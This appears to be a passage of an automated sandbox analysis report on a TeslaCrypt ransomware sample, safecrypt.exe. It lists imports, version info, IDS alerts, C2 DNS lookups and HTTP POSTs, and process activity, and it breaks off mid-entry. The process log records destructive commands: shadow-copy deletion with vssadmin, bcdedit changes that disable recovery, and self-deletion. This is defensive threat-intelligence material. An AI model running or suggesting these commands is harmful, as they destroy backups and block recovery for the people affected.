                  RT_ICON | 0x46f980 | 0x43e | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 50331872, next used block 3544003539 | |
                  RT_ICON | 0x4706f8 | 0x2cd | GLS_BINARY_LSB_FIRST | |
                  RT_ICON | 0x4707f8 | 0x163 | data | |
                  RT_DIALOG | 0x470160 | 0x395 | data | |
                  RT_DIALOG | 0x470298 | 0x3ae | data | |
                  RT_DIALOG | 0x4704c0 | 0x33c | data | |
                  RT_DIALOG | 0x4705b8 | 0x21f | data | |
                  RT_DIALOG | 0x46fc90 | 0x374 | data | |
                  RT_CURSOR | 0x4706d8 | 0x1ef | data | |
                  RT_CURSOR | 0x4706c0 | 0x412 | data | |
                  RT_CURSOR | 0x4706c8 | 0x2c0 | data | |
                  RT_GROUP_ICON | 0x46f830 | 0x338 | data | |
                  RT_GROUP_ICON | 0x4707e0 | 0x181 | data | |
                  RT_GROUP_ICON | 0x471420 | 0x22e | data | |
                  RT_GROUP_ICON | 0x46fc68 | 0x3dc | data | |
                  RT_VERSION | 0x46fd90 | 0x3d0 | data | |

                  Imports

                  DLL | Import
                  MSVCRT.dll | _controlfp, _wexecv, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, ldiv, _XcptFilter, floor, _onexit, __dllonexit, _flushall, _setmbcp, __CxxFrameHandler
                  GDI32.dll | GetTextColor, CreateFontW, SetViewportOrgEx, GetCharWidthW, GetDIBColorTable, EnumFontsW, CreateDCA, SetMetaRgn, RealizePalette, EnumFontFamiliesA, DeleteObject, GetCharABCWidthsA, CreateCompatibleBitmap, SetBkColor, RectVisible, StartDocW, SetGraphicsMode, GetWinMetaFileBits, SetBkMode, CreatePolyPolygonRgn, EnumEnhMetaFile, CreateMetaFileA, ExtFloodFill, Chord, GetCurrentObject, GetGlyphOutlineW, ExtTextOutW, MoveToEx, SetMapperFlags, GetWorldTransform, CreatePen, SetPolyFillMode, GetCharABCWidthsFloatW, GetEnhMetaFileW, CreateMetaFileW, GetSystemPaletteEntries, RemoveFontResourceA, PlayEnhMetaFileRecord, SetArcDirection, SetROP2, Ellipse, GetClipBox, GetFontData, CreateRectRgn, GetEnhMetaFileDescriptionW, CreateDIBSection, Rectangle, StrokeAndFillPath, Polyline, GdiFlush, GetNearestPaletteIndex, GetTextCharsetInfo, EqualRgn, SetStretchBltMode, PolyBezier, CreateRoundRectRgn, RectInRegion, PlayMetaFile, SetDIBColorTable, GetDCOrgEx, OffsetRgn, GetCharWidthA, GetDeviceCaps, GetTextExtentPoint32A, AbortPath, CopyEnhMetaFileW, StretchBlt, LPtoDP, CopyEnhMetaFileA, CreateICA, GetMetaFileBitsEx, SetDeviceGammaRamp, GetWindowExtEx, GetClipRgn, SetViewportExtEx, FrameRgn, SetRectRgn, CreateICW, GetPixel, CreateDiscardableBitmap, GetTextExtentPointA, Polygon, CreateFontA, DeleteDC, SaveDC, GetEnhMetaFilePaletteEntries, GetGlyphOutlineA, GetMapMode, GetPolyFillMode, CloseEnhMetaFile, GetPath, GetObjectW, EnumICMProfilesA, GetStockObject, DrawEscape, TextOutA, ScaleViewportExtEx, CreatePolygonRgn, SetPixelV, GetObjectA, EnumFontFamiliesExW, SelectObject, Arc, RoundRect, PlayEnhMetaFile, ExtCreateRegion, PolyPolygon, CreateDCW, GetROP2, GetPixelFormat, ExtEscape, PolyDraw, GetKerningPairsA, OffsetWindowOrgEx, GetOutlineTextMetricsA, RestoreDC, FillRgn, CreateHalftonePalette, GetRegionData, SetMetaFileBitsEx, CreateRectRgnIndirect, GetOutlineTextMetricsW, SetWindowOrgEx, EndPath, ExtTextOutA, ResizePalette, CancelDC, OffsetClipRgn, AnimatePalette, GetEnhMetaFileHeader, GetCharacterPlacementW, PtVisible
                  USER32.dll | GetMenuItemCount, CharNextA, GrayStringW, SwapMouseButton, DragDetect, EndPaint, GetTabbedTextExtentA, SendDlgItemMessageW, GetLastActivePopup, SetCapture, SetClassLongW, LoadMenuA, SetMenuDefaultItem, DrawFocusRect, CreateMDIWindowW, GetClassInfoA, FreeDDElParam, PostQuitMessage, SetScrollRange, GetDlgItemTextA, SetWindowTextA, KillTimer, GetWindowTextLengthA, GetParent, GetMenuItemRect, CreateMDIWindowA, LoadCursorA, SendInput, CopyAcceleratorTableW, ChildWindowFromPointEx, CreateDesktopW, SetActiveWindow, GetUpdateRgn, DialogBoxParamA, SetFocus, SetCaretPos, SetCursor, SetWindowPlacement, ExitWindowsEx, OpenClipboard, MessageBeep, ChangeDisplaySettingsW, GetScrollRange, GetClassLongW, SetWindowTextW, GetMenuItemInfoW, GetClassInfoW, GetUserObjectSecurity, CharToOemA, FrameRect, FindWindowExA, mouse_event, EnumChildWindows, PackDDElParam, CharPrevW, AttachThreadInput, SetClipboardData, GetDoubleClickTime, GetWindowLongA, GetDlgItemTextW, GetSystemMetrics, CloseWindow, CharToOemBuffW, CheckMenuItem, UnregisterClassW, TranslateAcceleratorA, MapVirtualKeyA, CreateMenu, GetMenuItemID, CreateDialogParamA, DrawStateA, GetWindowWord, VkKeyScanW, SendMessageCallbackA, GetClassLongA, DefFrameProcW, WindowFromDC, DrawTextExA, SetWindowLongA, GetGUIThreadInfo, SetMenuItemInfoW, ClipCursor, IsCharAlphaW, SetKeyboardState, InsertMenuW, GetWindowTextA, GetMenuContextHelpId, ReleaseDC, ShowOwnedPopups, RegisterClassExA, SendMessageW, IsCharAlphaA, EnumThreadWindows, GetDC, ScrollDC, CloseClipboard, WinHelpW, PeekMessageW, GetWindowTextW, LoadBitmapW, LoadMenuIndirectW, RemovePropA, MessageBoxIndirectA, CreatePopupMenu, TranslateMessage, SetUserObjectInformationW, ShowWindow, GetScrollInfo, CharLowerBuffW, PostThreadMessageW, SetRect, LoadMenuW, InvalidateRect, SetWinEventHook, LoadKeyboardLayoutA, EndDialog, EnableScrollBar, InvalidateRgn, GetTabbedTextExtentW, AppendMenuA, LoadCursorW, GetMessageExtraInfo, FindWindowW, EnableWindow, GetKeyboardState, CreateWindowExW, GetWindowRect, CharNextExA, CharNextW, SendDlgItemMessageA, GetClassInfoExW, IntersectRect, DrawIconEx, ModifyMenuA, GetProcessWindowStation, EnableMenuItem, GetDlgItem, GetNextDlgGroupItem, DdeQueryConvInfo, ClientToScreen, OemToCharBuffW, SetScrollInfo, GetScrollPos, IsDialogMessageA, MessageBoxA, GetKeyNameTextW, AppendMenuW, wvsprintfA, DrawAnimatedRects, DefWindowProcA, SetMenu, GetForegroundWindow, LoadMenuIndirectA, GetDlgItemInt, LoadCursorFromFileW, NotifyWinEvent, UnhookWindowsHook, BeginPaint, UpdateWindow, CallMsgFilterA, MoveWindow, GetClipboardViewer, DialogBoxIndirectParamA, MapVirtualKeyExW, CloseDesktop, GrayStringA, EnumDesktopsW, CreateIconFromResource, SendNotifyMessageW, ToAsciiEx, CharUpperBuffW, IsMenu, SendMessageA, SetMenuContextHelpId, RemoveMenu, EnumWindows, DefDlgProcA, MapDialogRect, DestroyCursor, CreateCursor, IsZoomed, SetSysColors, GetClassNameW, DestroyMenu, CharLowerA, IsCharLowerA, ChangeDisplaySettingsA, CopyImage, GetWindowPlacement, CharLowerW, DestroyIcon, SetScrollPos, IsWindowEnabled, SendNotifyMessageA, GetKeyboardLayout, BringWindowToTop, DialogBoxIndirectParamW, SetUserObjectSecurity, CreateDialogIndirectParamA, GetKeyState, LoadImageW, GetCursorPos, CopyRect, RegisterClassExW, SetMenuItemInfoA, SetForegroundWindow, GetClientRect, CharLowerBuffA, IsCharUpperA, VkKeyScanExA, ReuseDDElParam, WindowFromPoint, GetUserObjectInformationW, LoadAcceleratorsA, DdeAccessData, UnregisterClassA, MsgWaitForMultipleObjects, ToAscii, ReplyMessage, CharUpperW, ShowScrollBar, UnhookWinEvent, MapVirtualKeyW, GetMessageW, WaitMessage, GetClipCursor, SendMessageTimeoutW, GetClipboardFormatNameW, DdeGetData, UnionRect, InSendMessage, GetClassNameA, OffsetRect, SystemParametersInfoA, GetWindow, SetWindowLongW, LoadImageA, TranslateMDISysAccel, DefDlgProcW, ScrollWindow, RedrawWindow, CreateWindowExA, IsClipboardFormatAvailable, SetWindowContextHelpId, SetTimer, GetKeyboardLayoutList, SetRectEmpty, GetMenuCheckMarkDimensions, MessageBoxW, WinHelpA, ModifyMenuW, GetSubMenu, ChangeClipboardChain, TranslateAcceleratorW, DdeClientTransaction, FillRect, keybd_event, GetMessageA, ScrollWindowEx, AdjustWindowRect, SetWindowRgn, RegisterWindowMessageW, WaitForInputIdle, ScreenToClient, DrawIcon, IsChild, SetCaretBlinkTime, LoadIconA, ValidateRect, GetWindowThreadProcessId, GetMessagePos, GetQueueStatus, SetDlgItemTextA, ChildWindowFromPoint, LockWindowUpdate, CheckDlgButton, SetThreadDesktop, RegisterClipboardFormatA, GetNextDlgTabItem, DdeDisconnect, ShowCursor, EnumDesktopWindows, IsWindowVisible, LoadKeyboardLayoutW, TrackPopupMenu, DrawFrameControl, CharUpperA, DispatchMessageW, CallWindowProcA, DdeConnect, FindWindowA, CharToOemBuffA, EnumDisplaySettingsW, CopyIcon, BeginDeferWindowPos, VkKeyScanExW, ValidateRgn, GetOpenClipboardWindow, MapVirtualKeyExA, IsIconic, DestroyCaret, DestroyAcceleratorTable, GetKeyboardLayoutNameW, TrackPopupMenuEx, GetSysColorBrush, FindWindowExW, OpenDesktopA, GetMenuState, PostThreadMessageA, CreateWindowStationW, DrawCaption, PostMessageW, RegisterHotKey, CharPrevA, IsCharAlphaNumericA, PtInRect, LoadStringW, SetDlgItemInt, DrawTextExW, EnumDisplaySettingsA, CreateDialogIndirectParamW, SetWindowPos, OemToCharBuffA, SetClassLongA, GetSysColor, GetCapture, DestroyWindow
                  ADVAPI32.dll | RegCloseKey, FreeSid, RegEnumKeyExA, PrivilegedServiceAuditAlarmA, GetServiceDisplayNameW, GetAce, RegQueryValueA, CreateServiceW, BuildTrusteeWithSidW, AddAccessAllowedAce, EnumServicesStatusA, LookupAccountNameW, RegQueryValueW, SetEntriesInAclA, RegSetKeySecurity, GetSecurityDescriptorDacl, RegCreateKeyW, GetSidSubAuthorityCount, DuplicateTokenEx, BuildImpersonateTrusteeA, IsValidSecurityDescriptor, LsaFreeMemory, AddAce, DeleteAce, OpenThreadToken, RegNotifyChangeKeyValue, OpenEventLogW, SetNamedSecurityInfoA, GetFileSecurityW, GetServiceKeyNameW, QueryServiceStatus, LsaAddAccountRights, EqualSid, RegSetValueA, RegCreateKeyExA, RegUnLoadKeyW, CloseServiceHandle, RegReplaceKeyA, InitializeSecurityDescriptor
                  LZ32.dll | LZOpenFileW
                  KERNEL32.dll | CreateConsoleScreenBuffer, ClearCommBreak, GetModuleHandleA, GetStartupInfoA
                  MFC42.DLL |

                  Version Infos

                  Description | Data
                  LegalCopyright | Copyright (C) 2016
                  InternalName | Artery
                  FileVersion | 152, 162, 60, 63
                  CompanyName | eSnips Ltd.
                  PrivateBuild | 38, 97, 22, 219
                  LegalTrademarks | Unbar
                  Comments | Alighting
                  ProductName | Silvering Terrains
                  SpecialBuild | 171, 248, 221, 121
                  ProductVersion | 202, 130, 29, 218
                  FileDescription | Snows Amplification Travails
                  OriginalFilename | Aintl.EXE

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  03/24/21-18:30:54.406482 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 23.0.174.200
                  03/24/21-18:30:54.418525 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 195.225.118.33 | 192.168.2.6
                  03/24/21-18:30:54.420737 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 23.0.174.200
                  03/24/21-18:30:54.431772 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 91.201.58.73 | 192.168.2.6
                  03/24/21-18:30:54.432170 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 23.0.174.200
                  03/24/21-18:30:54.663223 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 91.206.52.56 | 192.168.2.6
                  03/24/21-18:30:54.663612 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 23.0.174.200
                  03/24/21-18:30:54.675395 | ICMP | 408 | ICMP Echo Reply | | | 23.0.174.200 | 192.168.2.6
                  03/24/21-18:31:33.121599 | TCP | 2022504 | ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon | 49709 | 80 | 192.168.2.6 | 185.53.178.54
                  03/24/21-18:31:33.363377 | TCP | 2022504 | ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon | 49710 | 80 | 192.168.2.6 | 52.60.87.163

                  Network Port Distribution

                  TCP Packets


                  UDP Packets

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Mar 24, 2021 18:31:11.660418987 CET | 192.168.2.6 | 8.8.8.8 | 0xc4b3 | Standard query (0) | southinstrument.org | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:11.773679972 CET | 192.168.2.6 | 8.8.8.8 | 0xbfe9 | Standard query (0) | bddadmin.desjardins.fr | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:32.955301046 CET | 192.168.2.6 | 8.8.8.8 | 0x9c1f | Standard query (0) | grant-pro.com | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:32.998641014 CET | 192.168.2.6 | 8.8.8.8 | 0x6f95 | Standard query (0) | educarpetas.com | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:33.191951990 CET | 192.168.2.6 | 8.8.8.8 | 0x831 | Standard query (0) | iicsdrd.com | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:33.480635881 CET | 192.168.2.6 | 8.8.8.8 | 0xbbed | Standard query (0) | dunyamuzelerimuzesi.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Mar 24, 2021 18:31:11.732952118 CET | 8.8.8.8 | 192.168.2.6 | 0xc4b3 | Name error (3) | southinstrument.org | none | none | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:11.823318005 CET | 8.8.8.8 | 192.168.2.6 | 0xbfe9 | No error (0) | bddadmin.desjardins.fr |  | 176.74.179.58 | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:32.977461100 CET | 8.8.8.8 | 192.168.2.6 | 0x9c1f | Name error (3) | grant-pro.com | none | none | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:33.036665916 CET | 8.8.8.8 | 192.168.2.6 | 0x6f95 | No error (0) | educarpetas.com |  | 185.53.178.54 | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:33.255119085 CET | 8.8.8.8 | 192.168.2.6 | 0x831 | No error (0) | iicsdrd.com |  | 52.60.87.163 | A (IP address) | IN (0x0001)
                  Mar 24, 2021 18:31:33.508387089 CET | 8.8.8.8 | 192.168.2.6 | 0xbbed | Name error (3) | dunyamuzelerimuzesi.com | none | none | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • educarpetas.com
                  • iicsdrd.com

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.6 | 49709 | 185.53.178.54 | 80 | C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 24, 2021 18:31:33.121598959 CET | 307 | OUT | POST /modules/mod_fxprev/libraries/mzsys.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
                  Host: educarpetas.com
                  Content-Length: 645
                  Cache-Control: no-cache
                  Mar 24, 2021 18:31:33.163768053 CET | 309 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Wed, 24 Mar 2021 17:31:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
                  Accept-CH: viewport-width, dpr, device-memory, rtt, downlink, ect, ua, ua-full-version, ua-platform, ua-platform-version, ua-arch, ua-model, ua-mobile
                  Accept-CH-Lifetime: 30
                  X-Language: english
                  X-Template: tpl_CleanPeppermintBlack_twoclick
                  X-Buckets: bucket084


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.6 | 49710 | 52.60.87.163 | 80 | C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 24, 2021 18:31:33.363377094 CET | 321 | OUT | POST /tmp/mzsys.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
                  Host: iicsdrd.com
                  Content-Length: 645
                  Cache-Control: no-cache
                  Mar 24, 2021 18:31:33.469351053 CET | 322 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 24 Mar 2021 17:31:33 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                  System Behavior

                  General

                  Start time:18:30:52
                  Start date:24/03/2021
                  Path:C:\Users\user\Desktop\safecrypt.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\safecrypt.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:18:30:53
                  Start date:24/03/2021
                  Path:C:\Users\user\Desktop\safecrypt.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\safecrypt.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs
                  Reputation:low

                  General

                  Start time:18:30:54
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 74%, Metadefender, Browse
                  • Detection: 96%, ReversingLabs
                  Reputation:low

                  General

                  Start time:18:30:55
                  Start date:24/03/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXE
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:55
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  Reputation:low

                  General

                  Start time:18:30:55
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:57
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} bootems off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:30:57
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:58
                  Start date:24/03/2021
                  Path:C:\Windows\System32\vssadmin.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
                  Imagebase:0x7ff77f280000
                  File size:145920 bytes
                  MD5 hash:47D51216EF45075B5F7EAA117CC70E40
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:30:58
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:59
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} advancedoptions off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:30:59
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:31:01
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} optionsedit off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:31:02
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:31:04
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:31:04
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:31:05
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:06
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} recoveryenabled off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:06
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000014.00000001.355902917.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs

                  General

                  Start time:18:31:06
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:13
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:14
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs

                  General

                  Start time:18:31:21
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:22
